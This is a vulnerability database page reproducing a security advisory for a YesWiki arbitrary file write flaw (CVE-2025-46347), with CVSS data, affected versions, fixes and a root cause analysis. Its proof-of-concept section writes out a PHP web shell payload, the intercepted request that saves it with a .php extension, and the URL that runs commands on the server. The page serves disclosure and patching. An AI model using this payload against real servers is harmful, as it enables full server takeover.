5.8

CVSS Score

4.0

Basic Information

CVE ID

CVE-2025-46347

GHSA ID

GHSA-88xg-v53p-fpvf

EPSS Score

0.67368%

CWE

CWE-116

Published

4/29/2025

Updated

4/29/2025

KEV Status

Technology

PHP

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-46347

CVE-2025-46347: YesWiki Remote Code Execution via Arbitrary PHP File Write and Execution

Summary

An arbitrary file write can be used to write a file with a PHP extension, which then can be browsed to in order to execute arbitrary code on the server.

All testing was performed on a local docker setup running the latest version of the application.

PoC

Proof of Concept

Navigate to http://localhost:8085/?LookWiki which allows you to click Create a new Graphical configuration where you specify some parameters and then click Save.

LookWiki

After clicking save, this request is made (most headers removed for clarity):

POST /?api/templates/custom-presets/test.css HTTP/1.1
Host: localhost:8085

primary-color=%230c5d6a&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serif

This request writes the file test.css to disk with the contents (abbreviated)

:root {
  --primary-color: #0c5d6a;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

To exploit this, utilize a proxy tool to intercept the the first request and change the filename extension to .php and add arbitrary PHP code in for one of the request body parameters.

e.g. primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E

Now the file pizzapower.php is written to /var/www/html/custom/css-presets/pizzapower.php and it starts with this, where the PHP code is present.

:root {
  --primary-color: <?php system($_GET['cmd']); ?>;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

Then, simply visit the file with a cmd parameter included.

http://localhost:8085/custom/css-presets/pizzapower.php?cmd=id

And the HTTP response will contain the output of our command. Notably this request can be performed unauthenticated (the creation of the file requires auth, though).

:root {
  --primary-color: uid=501(yeswiki) gid=501 groups=501
;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

injection

Impact

Full compromise of the server. Can potentially be performed unwittingly by a user subjected to the previously reported (or future) XSS vulnerabilities.

Fixes

Amongst others:

Restrict file extensions: Only allow a safelist of extensions (e.g., .css) when saving files via this feature. Harden server config: Disable PHP execution in user-writable directories

(GitHub Advisory)

5.8

CVSS Score

4.0

Basic Information

CVE ID

CVE-2025-46347

GHSA ID

GHSA-88xg-v53p-fpvf

EPSS Score

0.67368%

CWE

CWE-116

Published

4/29/2025

Updated

4/29/2025

KEV Status

Technology

PHP

Technical Details

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
yeswiki/yeswiki	composer	<= 4.5.3	4.5.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability description clearly states that an arbitrary file write occurs when creating a new graphical configuration. The provided PoC shows a POST request to /?api/templates/custom-presets/test.css. The commit diff shows that the addCustomCSSPreset method in ApiController.php is responsible for handling this request. The patch adds a check to ensure that the file extension is .css. Before this patch, the function would write a file with any extension provided in $presetFilename, including .php, and the content of the file was derived from $_POST parameters, which could include malicious PHP code. Therefore, ApiController::addCustomCSSPreset is the vulnerable function.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *n *r*itr*ry *il* writ* **n ** us** to writ* * *il* wit* * P*P *xt*nsion, w*i** t**n **n ** *rows** to in or**r to *x**ut* *r*itr*ry *o** on t** s*rv*r. *ll t*stin* w*s p*r*orm** on * lo**l *o*k*r s*tup runnin* t** l*t*st v*rsion o* t**

Reasoning

T** vuln*r**ility **s*ription *l**rly st*t*s t**t *n *r*itr*ry *il* writ* o**urs w**n *r**tin* * n*w *r*p*i**l *on*i*ur*tion. T** provi*** Po* s*ows * POST r*qu*st to `/?*pi/t*mpl*t*s/*ustom-pr*s*ts/t*st.*ss`. T** *ommit *i** s*ows t**t t** `****usto

5.8

Basic Information

Concerned about an active attack path?

CVE-2025-46347: YesWiki Remote Code Execution via Arbitrary PHP File Write and Execution

Summary

PoC

Impact

Fixes

5.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI